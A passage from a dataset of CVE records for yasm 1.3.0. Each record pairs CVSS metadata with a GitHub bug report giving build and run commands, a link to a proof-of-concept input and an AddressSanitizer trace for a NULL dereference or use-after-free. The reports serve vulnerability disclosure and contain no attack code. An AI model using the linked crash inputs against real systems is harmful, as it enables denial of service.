0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f6364ee182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2355 do_directive ==14280==ABORTING ```
A NULL pointer dereference in the function do_directive() modules/preprocs/nasm/nasm-pp.c:2355
https://api.github.com/repos/yasm/yasm/issues/169/comments
1
2021-05-19T08:25:00Z
2024-03-21T11:40:51Z
https://github.com/yasm/yasm/issues/169
895,145,758
169
CVE-2021-33456
2022-07-26T13:15:09.377
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in hash() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/175" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/175
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1114-hash-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==11392==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3f936ac15c bp 0x7ffc98fb57a0 sp 0x7ffc98fb5760 T0) #0 0x7f3f936ac15b in hash test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1114 #1 0x7f3f936b5ab9 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3103 #2 0x7f3f936c0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #3 0x7f3f936a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f3f9369b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f3f9368f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f3f9368f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f3f967b582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1114 hash ==11392==ABORTING ```
A NULL pointer dereference in the function hash() modules/preprocs/nasm/nasm-pp.c:1114
https://api.github.com/repos/yasm/yasm/issues/175/comments
1
2021-05-19T08:30:54Z
2024-03-21T11:46:29Z
https://github.com/yasm/yasm/issues/175
895,151,364
175
CVE-2021-33457
2022-07-26T13:15:09.417
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_mmac_params() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/171
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#151](https://github.com/yasm/yasm/issues/151) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-3857-expand_mmac_params-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==15506==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7fc6c3caf512 bp 0x7ffceebde200 sp 0x7ffceebde060 T0) #0 0x7fc6c3caf511 in expand_mmac_params test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3861 #1 0x7fc6c3cc08e8 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5078 #2 0x7fc6c3ca9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7fc6c3c9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7fc6c3c8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7fc6c3c8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7fc6c6db382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3861 expand_mmac_params ==15506==ABORTING ```
A NULL pointer dereference in the function expand_mmac_params() modules/preprocs/nasm/nasm-pp.c:3861
https://api.github.com/repos/yasm/yasm/issues/171/comments
2
2021-05-19T08:27:21Z
2024-03-21T11:48:05Z
https://github.com/yasm/yasm/issues/171
895,147,985
171
CVE-2021-33458
2022-07-26T13:15:09.457
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in find_cc() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/170" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/170
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-3811-find_cc-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==14891==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x7f8500dab0e4 bp 0x7ffc37b91380 sp 0x7ffc37b91340 T0) #0 0x7f8500dab0e3 in find_cc test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3815 #1 0x7f8500db0692 in expand_mmac_params test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3986 #2 0x7f8500dc08e8 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5078 #3 0x7f8500da9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f8500d9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f8500d8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f8500d8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f8503f0482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3815 find_cc ==14891==ABORTING ```
A NULL pointer dereference in the function find_cc() modules/preprocs/nasm/nasm-pp.c:3815
https://api.github.com/repos/yasm/yasm/issues/170/comments
1
2021-05-19T08:26:28Z
2024-03-21T12:44:18Z
https://github.com/yasm/yasm/issues/170
895,147,145
170
CVE-2021-33459
2022-07-26T13:15:09.500
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in nasm_parser_directive() in modules/parsers/nasm/nasm-parse.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/167" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/167
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1595-nasm_parser_directive-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==13148==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3a60e8fbb7 bp 0x7fff5f933810 sp 0x7fff5f933720 T0) #0 0x7f3a60e8fbb6 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1596 #1 0x7f3a60e9bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #2 0x7f3a60e9bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #3 0x7f3a60e8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #4 0x7f3a60e8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #5 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #6 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #7 0x7f3a6405182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1596 nasm_parser_directive ==13148==ABORTING ```
A NULL pointer dereference in the function nasm_parser_directive() modules/parsers/nasm/nasm-parse.c:1596
https://api.github.com/repos/yasm/yasm/issues/167/comments
1
2021-05-19T08:23:17Z
2024-03-21T11:50:13Z
https://github.com/yasm/yasm/issues/167
895,144,100
167
CVE-2021-33460
2022-07-26T13:15:09.547
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in if_condition() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/168
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-2134-if_condition-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==13685==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f1a02e5e870 bp 0x7fffcb38b530 sp 0x7fffcb38b380 T0) #0 0x7f1a02e5e86f in if_condition test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2134 #1 0x7f1a02eb88c7 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2907 #2 0x7f1a02ec0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #3 0x7f1a02ea9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f1a02e9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f1a02e8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #6 0x7f1a02e8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #7 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #8 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #9 0x7f1a0603682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2134 if_condition ==13685==ABORTING ```
A NULL pointer dereference in the function if_condition() modules/preprocs/nasm/nasm-pp.c:2134
https://api.github.com/repos/yasm/yasm/issues/168/comments
1
2021-05-19T08:24:08Z
2024-03-21T11:51:21Z
https://github.com/yasm/yasm/issues/168
895,144,888
168
CVE-2021-33461
2022-07-26T13:15:09.590
An issue was discovered in yasm version 1.3.0. There is a use-after-free in yasm_intnum_destroy() in libyasm/intnum.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/161" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/161
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#149](https://github.com/yasm/yasm/issues/149) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-415-yasm_intnum_destroy-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==16102==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000007098 at pc 0x7ffa04efacb7 bp 0x7fff5b056900 sp 0x7fff5b0568f0 READ of size 4 at 0x602000007098 thread T0 #0 0x7ffa04efacb6 in yasm_intnum_destroy test/yasm-uaf/SRC_asan/libyasm/intnum.c:415 #1 0x7ffa04ee7e69 in expr_delete_term test/yasm-uaf/SRC_asan/libyasm/expr.c:1017 #2 0x7ffa04ee7e69 in expr_simplify_identity test/yasm-uaf/SRC_asan/libyasm/expr.c:582 #3 0x7ffa04ee8e3c in expr_level_op test/yasm-uaf/SRC_asan/libyasm/expr.c:700 #4 0x7ffa04eea5d1 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:880 #5 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #6 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #7 0x7ffa04eeb686 in yasm_expr__level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:906 #8 0x7ffa04eeeb52 in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1261 #9 0x7ffa04ed9c03 in yasm_bc_create_data test/yasm-uaf/SRC_asan/libyasm/bc-data.c:292 #10 0x7ffa01795e6e in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:669 #11 0x7ffa0179b89f in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:258 #12 0x7ffa0179b89f in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:289 #13 0x7ffa0179b89f in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #14 0x7ffa0178f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #15 0x7ffa0178f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #16 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #17 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #18 0x7ffa0490b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #19 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x602000007098 is located 8 bytes inside of 16-byte region [0x602000007090,0x6020000070a0) freed by thread T0 here: #0 0x7ffa051c52ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7ffa04ee887c in expr_level_op test/yasm-uaf/SRC_asan/libyasm/expr.c:689 #2 0x7ffa04eea5d1 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:880 #3 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #4 0x7ffa04eea546 in expr_level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:864 #5 0x7ffa04eeb686 in yasm_expr__level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:906 #6 0x7ffa04eeeb52 in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1261 #7 0x7ffa04ed9c03 in yasm_bc_create_data test/yasm-uaf/SRC_asan/libyasm/bc-data.c:292 #8 0x7ffa01795e6e in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:669 #9 0x7ffa0179b89f in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:258 #10 0x7ffa0179b89f in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:289 #11 0x7ffa0179b89f in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #12 0x7ffa0178f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #13 0x7ffa0178f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #14 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #15 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #16 0x7ffa0490b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7ffa051c5602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7ffa04f16769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7ffa04efab26 in yasm_intnum_copy test/yasm-uaf/SRC_asan/libyasm/intnum.c:397 #3 0x7ffa04ee33e4 in expr_item_copy test/yasm-uaf/SRC_asan/libyasm/expr.c:975 #4 0x7ffa04ee33e4 in yasm_expr__copy_except test/yasm-uaf/SRC_asan/libyasm/expr.c:1006 #5 0x7ffa04eebc13 in expr_expand_equ test/yasm-uaf/SRC_asan/libyasm/expr.c:834 #6 0x7ffa04eebc13 in expr_expand_equ test/yasm-uaf/SRC_asan/libyasm/expr.c:843 #7 0x7ffa04eebc13 in expr_expand_equ test/yasm-uaf/SRC_asan/libyasm/expr.c:839 #8 0x7ffa04eebc13 in yasm_expr__level_tree test/yasm-uaf/SRC_asan/libyasm/expr.c:905 #9 0x7ffa04eeeb52 in yasm_expr_get_intnum test/yasm-uaf/SRC_asan/libyasm/expr.c:1261 #10 0x7ffa04ed9c03 in yasm_bc_create_data test/yasm-uaf/SRC_asan/libyasm/bc-data.c:292 #11 0x7ffa01795e6e in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:669 #12 0x7ffa0179b89f in parse_exp test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:258 #13 0x7ffa0179b89f in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:289 #14 0x7ffa0179b89f in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #15 0x7ffa0178f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #16 0x7ffa0178f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #17 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #18 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #19 0x7ffa0490b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/libyasm/intnum.c:415 yasm_intnum_destroy Shadow bytes around the buggy address: 0x0c047fff8dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8df0: fa fa fa fa fa 